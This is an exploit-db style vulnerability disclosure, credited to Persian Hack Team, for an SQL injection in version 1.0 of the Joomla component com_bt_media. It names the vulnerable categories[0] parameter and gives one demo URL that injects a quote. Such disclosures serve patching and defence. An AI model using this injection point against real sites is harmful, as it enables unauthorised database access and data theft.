Joomla! Component com_bt_media 1.0 – SQL Injection

  • 作者: Persian Hack Team
    日期: 2016-06-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39977/
  • ######################
    # Exploit Title : Joomla com_bt_media - SQL Injection
    # Exploit Author : Persian Hack Team
    # Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery
    # Category: [ Webapps ]
    # Tested on: [ Win ]
    # Version: 1.0
    # Date: 2016/06/19
    ######################
    #
    # PoC:
     
    # categories[0]= Parameter Vulnerable To SQL
     
    # Demo :
     
    # http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134
    
     
    # Please Free Yaser Ebrahimi
     
    ######################
    # Discovered by : Mojtaba MobhaM 
    # Greetz : T3NZOG4N & FireKernel & Masood Ostad & Dr.Koorangi &Milad Hacking & JOK3R And All Persian Hack Team Members
    # Homepage : persian-team.ir
    ######################